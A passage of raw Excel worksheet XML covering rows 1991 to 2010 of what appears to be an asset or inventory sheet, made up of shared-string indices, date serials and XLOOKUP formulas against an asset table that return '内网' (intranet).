      <c r="I1991" t="s">
        <v>3688</v>
      </c>
      <c r="J1991" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1991" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1991" t="s">
        <v>4331</v>
      </c>
      <c r="M1991" t="s">
        <v>4772</v>
      </c>
      <c r="N1991" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1991,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1991" t="s">
        <v>3701</v>
      </c>
      <c r="P1991" t="s">
        <v>4286</v>
      </c>
      <c r="Q1991" t="s">
        <v>3690</v>
      </c>
      <c r="R1991" t="s">
        <v>3693</v>
      </c>
      <c r="S1991" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1991" s="29">
        <v>46004.0282175926</v>
      </c>
      <c r="U1991" t="s">
        <v>4797</v>
      </c>
      <c r="V1991" t="s">
        <v>4798</v>
      </c>
      <c r="W1991" t="s">
        <v>4799</v>
      </c>
    </row>
    <row r="1992" customHeight="1" spans="1:23">
      <c r="A1992">
        <v>1991</v>
      </c>
      <c r="B1992" t="s">
        <v>4844</v>
      </c>
      <c r="C1992" t="s">
        <v>3683</v>
      </c>
      <c r="D1992" t="s">
        <v>3684</v>
      </c>
      <c r="E1992" t="s">
        <v>3699</v>
      </c>
      <c r="F1992" t="s">
        <v>3686</v>
      </c>
      <c r="G1992" t="s">
        <v>3687</v>
      </c>
      <c r="H1992" t="s">
        <v>3576</v>
      </c>
      <c r="I1992" t="s">
        <v>3688</v>
      </c>
      <c r="J1992" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1992" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1992" t="s">
        <v>4331</v>
      </c>
      <c r="M1992" t="s">
        <v>4772</v>
      </c>
      <c r="N1992" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1992,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1992" t="s">
        <v>3701</v>
      </c>
      <c r="P1992" t="s">
        <v>4286</v>
      </c>
      <c r="Q1992" t="s">
        <v>3690</v>
      </c>
      <c r="R1992" t="s">
        <v>3693</v>
      </c>
      <c r="S1992" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1992" s="29">
        <v>46004.0281944444</v>
      </c>
      <c r="U1992" t="s">
        <v>4845</v>
      </c>
      <c r="V1992" t="s">
        <v>4846</v>
      </c>
      <c r="W1992" t="s">
        <v>4847</v>
      </c>
    </row>
    <row r="1993" customHeight="1" spans="1:23">
      <c r="A1993">
        <v>1992</v>
      </c>
      <c r="B1993" t="s">
        <v>4857</v>
      </c>
      <c r="C1993" t="s">
        <v>3683</v>
      </c>
      <c r="D1993" t="s">
        <v>3684</v>
      </c>
      <c r="E1993" t="s">
        <v>3699</v>
      </c>
      <c r="F1993" t="s">
        <v>3686</v>
      </c>
      <c r="G1993" t="s">
        <v>3687</v>
      </c>
      <c r="H1993" t="s">
        <v>3576</v>
      </c>
      <c r="I1993" t="s">
        <v>3688</v>
      </c>
      <c r="J1993" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1993" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1993" t="s">
        <v>4331</v>
      </c>
      <c r="M1993" t="s">
        <v>4772</v>
      </c>
      <c r="N1993" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1993,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1993" t="s">
        <v>3701</v>
      </c>
      <c r="P1993" t="s">
        <v>4286</v>
      </c>
      <c r="Q1993" t="s">
        <v>3690</v>
      </c>
      <c r="R1993" t="s">
        <v>3693</v>
      </c>
      <c r="S1993" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1993" s="29">
        <v>46004.0281944444</v>
      </c>
      <c r="U1993" t="s">
        <v>4858</v>
      </c>
      <c r="V1993" t="s">
        <v>4859</v>
      </c>
      <c r="W1993" t="s">
        <v>4860</v>
      </c>
    </row>
    <row r="1994" customHeight="1" spans="1:23">
      <c r="A1994">
        <v>1993</v>
      </c>
      <c r="B1994" t="s">
        <v>5001</v>
      </c>
      <c r="C1994" t="s">
        <v>3683</v>
      </c>
      <c r="D1994" t="s">
        <v>3684</v>
      </c>
      <c r="E1994" t="s">
        <v>3699</v>
      </c>
      <c r="F1994" t="s">
        <v>3686</v>
      </c>
      <c r="G1994" t="s">
        <v>5002</v>
      </c>
      <c r="H1994" t="s">
        <v>3576</v>
      </c>
      <c r="I1994" t="s">
        <v>3688</v>
      </c>
      <c r="J1994" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1994" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1994" t="s">
        <v>4246</v>
      </c>
      <c r="M1994" t="s">
        <v>4772</v>
      </c>
      <c r="N1994" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1994,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1994" t="s">
        <v>3701</v>
      </c>
      <c r="P1994" t="s">
        <v>4286</v>
      </c>
      <c r="Q1994" t="s">
        <v>3690</v>
      </c>
      <c r="R1994" t="s">
        <v>3693</v>
      </c>
      <c r="S1994" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1994" s="29">
        <v>46004.0280555556</v>
      </c>
      <c r="U1994" t="s">
        <v>5003</v>
      </c>
      <c r="V1994" t="s">
        <v>4859</v>
      </c>
      <c r="W1994" t="s">
        <v>4899</v>
      </c>
    </row>
    <row r="1995" customHeight="1" spans="1:23">
      <c r="A1995">
        <v>1994</v>
      </c>
      <c r="B1995" t="s">
        <v>4905</v>
      </c>
      <c r="C1995" t="s">
        <v>3683</v>
      </c>
      <c r="D1995" t="s">
        <v>3684</v>
      </c>
      <c r="E1995" t="s">
        <v>3706</v>
      </c>
      <c r="F1995" t="s">
        <v>3686</v>
      </c>
      <c r="G1995" t="s">
        <v>3687</v>
      </c>
      <c r="H1995" t="s">
        <v>3576</v>
      </c>
      <c r="I1995" t="s">
        <v>3688</v>
      </c>
      <c r="J1995" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1995" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1995" t="s">
        <v>4246</v>
      </c>
      <c r="M1995" t="s">
        <v>4772</v>
      </c>
      <c r="N1995" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1995,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1995" t="s">
        <v>3691</v>
      </c>
      <c r="P1995" t="s">
        <v>4286</v>
      </c>
      <c r="Q1995" t="s">
        <v>3690</v>
      </c>
      <c r="R1995" t="s">
        <v>3693</v>
      </c>
      <c r="S1995" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1995" s="29">
        <v>46004.0280555556</v>
      </c>
      <c r="U1995" t="s">
        <v>4906</v>
      </c>
      <c r="V1995" t="s">
        <v>4907</v>
      </c>
      <c r="W1995" t="s">
        <v>4908</v>
      </c>
    </row>
    <row r="1996" customHeight="1" spans="1:23">
      <c r="A1996">
        <v>1995</v>
      </c>
      <c r="B1996" t="s">
        <v>5004</v>
      </c>
      <c r="C1996" t="s">
        <v>3683</v>
      </c>
      <c r="D1996" t="s">
        <v>3684</v>
      </c>
      <c r="E1996" t="s">
        <v>3699</v>
      </c>
      <c r="F1996" t="s">
        <v>3686</v>
      </c>
      <c r="G1996" t="s">
        <v>3687</v>
      </c>
      <c r="H1996" t="s">
        <v>3576</v>
      </c>
      <c r="I1996" t="s">
        <v>3688</v>
      </c>
      <c r="J1996" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1996" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1996" t="s">
        <v>4246</v>
      </c>
      <c r="M1996" t="s">
        <v>4772</v>
      </c>
      <c r="N1996" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1996,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1996" t="s">
        <v>3701</v>
      </c>
      <c r="P1996" t="s">
        <v>4286</v>
      </c>
      <c r="Q1996" t="s">
        <v>3690</v>
      </c>
      <c r="R1996" t="s">
        <v>3693</v>
      </c>
      <c r="S1996" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1996" s="29">
        <v>46004.0280555556</v>
      </c>
      <c r="U1996" t="s">
        <v>4910</v>
      </c>
      <c r="V1996" t="s">
        <v>5005</v>
      </c>
      <c r="W1996" t="s">
        <v>5006</v>
      </c>
    </row>
    <row r="1997" customHeight="1" spans="1:23">
      <c r="A1997">
        <v>1996</v>
      </c>
      <c r="B1997" t="s">
        <v>4958</v>
      </c>
      <c r="C1997" t="s">
        <v>3683</v>
      </c>
      <c r="D1997" t="s">
        <v>3684</v>
      </c>
      <c r="E1997" t="s">
        <v>3699</v>
      </c>
      <c r="F1997" t="s">
        <v>3686</v>
      </c>
      <c r="G1997" t="s">
        <v>3687</v>
      </c>
      <c r="H1997" t="s">
        <v>3576</v>
      </c>
      <c r="I1997" t="s">
        <v>3688</v>
      </c>
      <c r="J1997" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1997" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1997" t="s">
        <v>4246</v>
      </c>
      <c r="M1997" t="s">
        <v>4772</v>
      </c>
      <c r="N1997" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1997,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1997" t="s">
        <v>3701</v>
      </c>
      <c r="P1997" t="s">
        <v>4286</v>
      </c>
      <c r="Q1997" t="s">
        <v>3690</v>
      </c>
      <c r="R1997" t="s">
        <v>3693</v>
      </c>
      <c r="S1997" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1997" s="29">
        <v>46004.0280439815</v>
      </c>
      <c r="U1997" t="s">
        <v>4910</v>
      </c>
      <c r="V1997" t="s">
        <v>4959</v>
      </c>
      <c r="W1997" t="s">
        <v>4960</v>
      </c>
    </row>
    <row r="1998" customHeight="1" spans="1:23">
      <c r="A1998">
        <v>1997</v>
      </c>
      <c r="B1998" t="s">
        <v>4965</v>
      </c>
      <c r="C1998" t="s">
        <v>3683</v>
      </c>
      <c r="D1998" t="s">
        <v>3684</v>
      </c>
      <c r="E1998" t="s">
        <v>3699</v>
      </c>
      <c r="F1998" t="s">
        <v>3686</v>
      </c>
      <c r="G1998" t="s">
        <v>4966</v>
      </c>
      <c r="H1998" t="s">
        <v>3576</v>
      </c>
      <c r="I1998" t="s">
        <v>3688</v>
      </c>
      <c r="J1998" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1998" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1998" t="s">
        <v>4246</v>
      </c>
      <c r="M1998" t="s">
        <v>4772</v>
      </c>
      <c r="N1998" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1998,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1998" t="s">
        <v>3701</v>
      </c>
      <c r="P1998" t="s">
        <v>4286</v>
      </c>
      <c r="Q1998" t="s">
        <v>3690</v>
      </c>
      <c r="R1998" t="s">
        <v>3693</v>
      </c>
      <c r="S1998" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1998" s="29">
        <v>46004.0280439815</v>
      </c>
      <c r="U1998" t="s">
        <v>4967</v>
      </c>
      <c r="V1998" t="s">
        <v>4968</v>
      </c>
    </row>
    <row r="1999" customHeight="1" spans="1:23">
      <c r="A1999">
        <v>1998</v>
      </c>
      <c r="B1999" t="s">
        <v>4874</v>
      </c>
      <c r="C1999" t="s">
        <v>3683</v>
      </c>
      <c r="D1999" t="s">
        <v>3684</v>
      </c>
      <c r="E1999" t="s">
        <v>3699</v>
      </c>
      <c r="F1999" t="s">
        <v>3686</v>
      </c>
      <c r="G1999" t="s">
        <v>3687</v>
      </c>
      <c r="H1999" t="s">
        <v>3576</v>
      </c>
      <c r="I1999" t="s">
        <v>3688</v>
      </c>
      <c r="J1999" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K1999" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L1999" t="s">
        <v>4246</v>
      </c>
      <c r="M1999" t="s">
        <v>4772</v>
      </c>
      <c r="N1999" s="31" t="str">
        <f>_xlfn.XLOOKUP(K1999,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O1999" t="s">
        <v>3701</v>
      </c>
      <c r="P1999" t="s">
        <v>4286</v>
      </c>
      <c r="Q1999" t="s">
        <v>3690</v>
      </c>
      <c r="R1999" t="s">
        <v>3693</v>
      </c>
      <c r="S1999" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T1999" s="29">
        <v>46004.0283680556</v>
      </c>
      <c r="U1999" t="s">
        <v>5013</v>
      </c>
      <c r="V1999" t="s">
        <v>5014</v>
      </c>
      <c r="W1999" t="s">
        <v>5015</v>
      </c>
    </row>
    <row r="2000" customHeight="1" spans="1:23">
      <c r="A2000">
        <v>1999</v>
      </c>
      <c r="B2000" t="s">
        <v>4870</v>
      </c>
      <c r="C2000" t="s">
        <v>3683</v>
      </c>
      <c r="D2000" t="s">
        <v>3684</v>
      </c>
      <c r="E2000" t="s">
        <v>3699</v>
      </c>
      <c r="F2000" t="s">
        <v>3686</v>
      </c>
      <c r="G2000" t="s">
        <v>3687</v>
      </c>
      <c r="H2000" t="s">
        <v>3576</v>
      </c>
      <c r="I2000" t="s">
        <v>3688</v>
      </c>
      <c r="J2000" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2000" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2000" t="s">
        <v>4246</v>
      </c>
      <c r="M2000" t="s">
        <v>4772</v>
      </c>
      <c r="N2000" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2000,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2000" t="s">
        <v>3701</v>
      </c>
      <c r="P2000" t="s">
        <v>4286</v>
      </c>
      <c r="Q2000" t="s">
        <v>3690</v>
      </c>
      <c r="R2000" t="s">
        <v>3693</v>
      </c>
      <c r="S2000" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2000" s="29">
        <v>46004.0283564815</v>
      </c>
      <c r="U2000" t="s">
        <v>5035</v>
      </c>
      <c r="V2000" t="s">
        <v>5036</v>
      </c>
      <c r="W2000" t="s">
        <v>5037</v>
      </c>
    </row>
    <row r="2001" customHeight="1" spans="1:23">
      <c r="A2001">
        <v>2000</v>
      </c>
      <c r="B2001" t="s">
        <v>5038</v>
      </c>
      <c r="C2001" t="s">
        <v>3683</v>
      </c>
      <c r="D2001" t="s">
        <v>3684</v>
      </c>
      <c r="E2001" t="s">
        <v>3706</v>
      </c>
      <c r="F2001" t="s">
        <v>3686</v>
      </c>
      <c r="G2001" t="s">
        <v>3687</v>
      </c>
      <c r="H2001" t="s">
        <v>3576</v>
      </c>
      <c r="I2001" t="s">
        <v>3688</v>
      </c>
      <c r="J2001" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2001" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2001" t="s">
        <v>4246</v>
      </c>
      <c r="M2001" t="s">
        <v>4772</v>
      </c>
      <c r="N2001" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2001,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2001" t="s">
        <v>3691</v>
      </c>
      <c r="P2001" t="s">
        <v>4286</v>
      </c>
      <c r="Q2001" t="s">
        <v>3690</v>
      </c>
      <c r="R2001" t="s">
        <v>3693</v>
      </c>
      <c r="S2001" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2001" s="29">
        <v>46004.0283449074</v>
      </c>
      <c r="U2001" t="s">
        <v>5039</v>
      </c>
      <c r="V2001" t="s">
        <v>5040</v>
      </c>
      <c r="W2001" t="s">
        <v>5041</v>
      </c>
    </row>
    <row r="2002" customHeight="1" spans="1:23">
      <c r="A2002">
        <v>2001</v>
      </c>
      <c r="B2002" t="s">
        <v>5042</v>
      </c>
      <c r="C2002" t="s">
        <v>3683</v>
      </c>
      <c r="D2002" t="s">
        <v>3684</v>
      </c>
      <c r="E2002" t="s">
        <v>3699</v>
      </c>
      <c r="F2002" t="s">
        <v>3686</v>
      </c>
      <c r="G2002" t="s">
        <v>3687</v>
      </c>
      <c r="H2002" t="s">
        <v>3576</v>
      </c>
      <c r="I2002" t="s">
        <v>3688</v>
      </c>
      <c r="J2002" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2002" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2002" t="s">
        <v>4246</v>
      </c>
      <c r="M2002" t="s">
        <v>4772</v>
      </c>
      <c r="N2002" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2002,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2002" t="s">
        <v>3701</v>
      </c>
      <c r="P2002" t="s">
        <v>4286</v>
      </c>
      <c r="Q2002" t="s">
        <v>3690</v>
      </c>
      <c r="R2002" t="s">
        <v>3693</v>
      </c>
      <c r="S2002" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2002" s="29">
        <v>46004.0283217593</v>
      </c>
      <c r="U2002" t="s">
        <v>5043</v>
      </c>
      <c r="V2002" t="s">
        <v>5044</v>
      </c>
      <c r="W2002" t="s">
        <v>5045</v>
      </c>
    </row>
    <row r="2003" customHeight="1" spans="1:23">
      <c r="A2003">
        <v>2002</v>
      </c>
      <c r="B2003" t="s">
        <v>4801</v>
      </c>
      <c r="C2003" t="s">
        <v>3683</v>
      </c>
      <c r="D2003" t="s">
        <v>3684</v>
      </c>
      <c r="E2003" t="s">
        <v>3699</v>
      </c>
      <c r="F2003" t="s">
        <v>3686</v>
      </c>
      <c r="G2003" t="s">
        <v>3687</v>
      </c>
      <c r="H2003" t="s">
        <v>3576</v>
      </c>
      <c r="I2003" t="s">
        <v>3688</v>
      </c>
      <c r="J2003" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2003" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2003" t="s">
        <v>4331</v>
      </c>
      <c r="M2003" t="s">
        <v>4772</v>
      </c>
      <c r="N2003" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2003,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2003" t="s">
        <v>3701</v>
      </c>
      <c r="P2003" t="s">
        <v>4286</v>
      </c>
      <c r="Q2003" t="s">
        <v>3690</v>
      </c>
      <c r="R2003" t="s">
        <v>3693</v>
      </c>
      <c r="S2003" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2003" s="29">
        <v>46004.0283101852</v>
      </c>
      <c r="U2003" t="s">
        <v>4802</v>
      </c>
      <c r="V2003" t="s">
        <v>4803</v>
      </c>
      <c r="W2003" t="s">
        <v>4804</v>
      </c>
    </row>
    <row r="2004" customHeight="1" spans="1:23">
      <c r="A2004">
        <v>2003</v>
      </c>
      <c r="B2004" t="s">
        <v>4776</v>
      </c>
      <c r="C2004" t="s">
        <v>3683</v>
      </c>
      <c r="D2004" t="s">
        <v>3684</v>
      </c>
      <c r="E2004" t="s">
        <v>3699</v>
      </c>
      <c r="F2004" t="s">
        <v>3686</v>
      </c>
      <c r="G2004" t="s">
        <v>3687</v>
      </c>
      <c r="H2004" t="s">
        <v>3576</v>
      </c>
      <c r="I2004" t="s">
        <v>3688</v>
      </c>
      <c r="J2004" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2004" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2004" t="s">
        <v>4331</v>
      </c>
      <c r="M2004" t="s">
        <v>4772</v>
      </c>
      <c r="N2004" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2004,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2004" t="s">
        <v>3701</v>
      </c>
      <c r="P2004" t="s">
        <v>4286</v>
      </c>
      <c r="Q2004" t="s">
        <v>3690</v>
      </c>
      <c r="R2004" t="s">
        <v>3693</v>
      </c>
      <c r="S2004" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2004" s="29">
        <v>46004.028275463</v>
      </c>
      <c r="U2004" t="s">
        <v>4777</v>
      </c>
      <c r="V2004" t="s">
        <v>4778</v>
      </c>
      <c r="W2004" t="s">
        <v>4779</v>
      </c>
    </row>
    <row r="2005" customHeight="1" spans="1:23">
      <c r="A2005">
        <v>2004</v>
      </c>
      <c r="B2005" t="s">
        <v>4805</v>
      </c>
      <c r="C2005" t="s">
        <v>3683</v>
      </c>
      <c r="D2005" t="s">
        <v>3684</v>
      </c>
      <c r="E2005" t="s">
        <v>3706</v>
      </c>
      <c r="F2005" t="s">
        <v>3686</v>
      </c>
      <c r="G2005" t="s">
        <v>3687</v>
      </c>
      <c r="H2005" t="s">
        <v>3576</v>
      </c>
      <c r="I2005" t="s">
        <v>3688</v>
      </c>
      <c r="J2005" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2005" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2005" t="s">
        <v>4331</v>
      </c>
      <c r="M2005" t="s">
        <v>4772</v>
      </c>
      <c r="N2005" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2005,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2005" t="s">
        <v>3691</v>
      </c>
      <c r="P2005" t="s">
        <v>4286</v>
      </c>
      <c r="Q2005" t="s">
        <v>3690</v>
      </c>
      <c r="R2005" t="s">
        <v>3693</v>
      </c>
      <c r="S2005" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2005" s="29">
        <v>46004.0282638889</v>
      </c>
      <c r="U2005" t="s">
        <v>4773</v>
      </c>
      <c r="V2005" t="s">
        <v>4806</v>
      </c>
      <c r="W2005" t="s">
        <v>4807</v>
      </c>
    </row>
    <row r="2006" customHeight="1" spans="1:23">
      <c r="A2006">
        <v>2005</v>
      </c>
      <c r="B2006" t="s">
        <v>4784</v>
      </c>
      <c r="C2006" t="s">
        <v>3683</v>
      </c>
      <c r="D2006" t="s">
        <v>3684</v>
      </c>
      <c r="E2006" t="s">
        <v>3699</v>
      </c>
      <c r="F2006" t="s">
        <v>3686</v>
      </c>
      <c r="G2006" t="s">
        <v>3687</v>
      </c>
      <c r="H2006" t="s">
        <v>3576</v>
      </c>
      <c r="I2006" t="s">
        <v>3688</v>
      </c>
      <c r="J2006" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2006" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2006" t="s">
        <v>4331</v>
      </c>
      <c r="M2006" t="s">
        <v>4772</v>
      </c>
      <c r="N2006" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2006,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2006" t="s">
        <v>3701</v>
      </c>
      <c r="P2006" t="s">
        <v>4286</v>
      </c>
      <c r="Q2006" t="s">
        <v>3690</v>
      </c>
      <c r="R2006" t="s">
        <v>3693</v>
      </c>
      <c r="S2006" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2006" s="29">
        <v>46004.0282407407</v>
      </c>
      <c r="U2006" t="s">
        <v>4785</v>
      </c>
      <c r="V2006" t="s">
        <v>4786</v>
      </c>
      <c r="W2006" t="s">
        <v>4787</v>
      </c>
    </row>
    <row r="2007" customHeight="1" spans="1:23">
      <c r="A2007">
        <v>2006</v>
      </c>
      <c r="B2007" t="s">
        <v>4834</v>
      </c>
      <c r="C2007" t="s">
        <v>3683</v>
      </c>
      <c r="D2007" t="s">
        <v>3684</v>
      </c>
      <c r="E2007" t="s">
        <v>3699</v>
      </c>
      <c r="F2007" t="s">
        <v>3686</v>
      </c>
      <c r="G2007" t="s">
        <v>3687</v>
      </c>
      <c r="H2007" t="s">
        <v>3576</v>
      </c>
      <c r="I2007" t="s">
        <v>3688</v>
      </c>
      <c r="J2007" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2007" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2007" t="s">
        <v>4331</v>
      </c>
      <c r="M2007" t="s">
        <v>4772</v>
      </c>
      <c r="N2007" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2007,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2007" t="s">
        <v>3701</v>
      </c>
      <c r="P2007" t="s">
        <v>4286</v>
      </c>
      <c r="Q2007" t="s">
        <v>3690</v>
      </c>
      <c r="R2007" t="s">
        <v>3693</v>
      </c>
      <c r="S2007" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2007" s="29">
        <v>46004.0282175926</v>
      </c>
      <c r="U2007" t="s">
        <v>4793</v>
      </c>
      <c r="V2007" t="s">
        <v>4835</v>
      </c>
      <c r="W2007" t="s">
        <v>4836</v>
      </c>
    </row>
    <row r="2008" customHeight="1" spans="1:23">
      <c r="A2008">
        <v>2007</v>
      </c>
      <c r="B2008" t="s">
        <v>4808</v>
      </c>
      <c r="C2008" t="s">
        <v>3683</v>
      </c>
      <c r="D2008" t="s">
        <v>3684</v>
      </c>
      <c r="E2008" t="s">
        <v>3699</v>
      </c>
      <c r="F2008" t="s">
        <v>3686</v>
      </c>
      <c r="G2008" t="s">
        <v>3687</v>
      </c>
      <c r="H2008" t="s">
        <v>3576</v>
      </c>
      <c r="I2008" t="s">
        <v>3688</v>
      </c>
      <c r="J2008" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2008" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2008" t="s">
        <v>4331</v>
      </c>
      <c r="M2008" t="s">
        <v>4772</v>
      </c>
      <c r="N2008" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2008,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2008" t="s">
        <v>3701</v>
      </c>
      <c r="P2008" t="s">
        <v>4286</v>
      </c>
      <c r="Q2008" t="s">
        <v>3690</v>
      </c>
      <c r="R2008" t="s">
        <v>3693</v>
      </c>
      <c r="S2008" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2008" s="29">
        <v>46004.0282060185</v>
      </c>
      <c r="U2008" t="s">
        <v>4793</v>
      </c>
      <c r="V2008" t="s">
        <v>4809</v>
      </c>
      <c r="W2008" t="s">
        <v>4810</v>
      </c>
    </row>
    <row r="2009" customHeight="1" spans="1:23">
      <c r="A2009">
        <v>2008</v>
      </c>
      <c r="B2009" t="s">
        <v>4837</v>
      </c>
      <c r="C2009" t="s">
        <v>3683</v>
      </c>
      <c r="D2009" t="s">
        <v>3684</v>
      </c>
      <c r="E2009" t="s">
        <v>3699</v>
      </c>
      <c r="F2009" t="s">
        <v>3686</v>
      </c>
      <c r="G2009" t="s">
        <v>3687</v>
      </c>
      <c r="H2009" t="s">
        <v>3576</v>
      </c>
      <c r="I2009" t="s">
        <v>3688</v>
      </c>
      <c r="J2009" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2009" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2009" t="s">
        <v>4331</v>
      </c>
      <c r="M2009" t="s">
        <v>4772</v>
      </c>
      <c r="N2009" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2009,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2009" t="s">
        <v>3701</v>
      </c>
      <c r="P2009" t="s">
        <v>4286</v>
      </c>
      <c r="Q2009" t="s">
        <v>3690</v>
      </c>
      <c r="R2009" t="s">
        <v>3693</v>
      </c>
      <c r="S2009" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2009" s="29">
        <v>46004.0281828704</v>
      </c>
      <c r="U2009" t="s">
        <v>4838</v>
      </c>
      <c r="V2009" t="s">
        <v>4839</v>
      </c>
      <c r="W2009" t="s">
        <v>4840</v>
      </c>
    </row>
    <row r="2010" customHeight="1" spans="1:23">
      <c r="A2010">
        <v>2009</v>
      </c>
      <c r="B2010" t="s">
        <v>4792</v>
      </c>
      <c r="C2010" t="s">
        <v>3683</v>
      </c>
      <c r="D2010" t="s">
        <v>3684</v>
      </c>
      <c r="E2010" t="s">
        <v>3699</v>
      </c>
      <c r="F2010" t="s">
        <v>3686</v>
      </c>
      <c r="G2010" t="s">
        <v>3687</v>
      </c>
      <c r="H2010" t="s">
        <v>3576</v>
      </c>
      <c r="I2010" t="s">
        <v>3688</v>
      </c>
      <c r="J2010" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="K2010" s="28" t="s">
        <v>3577</v>
      </c>
      <c r="L2010" t="s">
        <v>4331</v>
      </c>
      <c r="M2010" t="s">
        <v>4772</v>
      </c>
      <c r="N2010" s="31" t="str">
        <f>_xlfn.XLOOKUP(K2010,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O2010" t="s">
        <v>3701</v>
      </c>
      <c r="P2010" t="s">
        <v>4286</v>
      </c>
      <c r="Q2010" t="s">
        <v>3690</v>
      </c>
      <c r="R2010" t="s">
        <v>3693</v>
      </c>
      <c r="S2010" s="29">
        <v>45514.0215509259</v>
      </c>
      <c r="T2010" s="29">
        <v>46004.0281712963</v>
      </c>
      <c r="U2010" t="s">
        <v>4793</v>
      </c>
      <c r="V2010" t="s">
        <v>4794</v>
      </c>
      <c r="W2010" t="s">
        <v>4795</v>
      </c>
    </row>
    <row r="2011" customHeight="1" spans="1:23">
      <c r="A2011">
        <v>2010</v>
      </c>
